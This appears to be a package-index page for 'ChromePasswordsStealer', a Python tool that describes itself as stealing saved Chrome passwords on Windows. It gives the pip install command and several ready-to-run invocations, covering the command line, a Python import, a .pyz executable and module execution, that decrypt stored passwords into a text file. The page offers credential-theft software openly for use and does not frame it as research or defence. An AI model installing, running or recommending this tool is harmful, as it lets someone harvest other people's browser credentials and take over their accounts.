Skip to main content

This package steal chrome password on Windows.

Project description

ChromePasswordsStealer

Description

This package steal chrome password on Windows.

Requirements

This package require :

  • python3
  • python3 Standard Library
  • pywin32

Installation

pip install ChromePasswordsStealer

Launcher

Command line:

ChromeStealer # get chromes passwords and save it in "passwords.txt"
ChromeStealer save_passwords.txt # get chromes passwords and save it in "save_passwords.txt"

Python script

from ChromePasswordsStealer import ChromePasswordsStealer, steal

steal() # get chromes passwords and save it in "passwords.txt"

stealer = ChromePasswordsStealer(filename="save_passwords.txt")
stealer.decrypt_and_save() # get chromes passwords and save it in "save_passwords.txt"

Python executable:

python3 ChromePasswordsStealer.pyz save_passwords.txt

# OR
chmod u+x ChromePasswordsStealer.pyz # add execute rights
./ChromePasswordsStealer.pyz aaa # execute file

Python module (command line):

python3 -m ChromePasswordsStealer
python3 -m ChromePasswordsStealer.ChromePasswordsStealer save_passwords.txt

Links

Licence

Licensed under the GPL, version 3.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

ChromePasswordsStealer-0.0.1.tar.gz (16.7 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page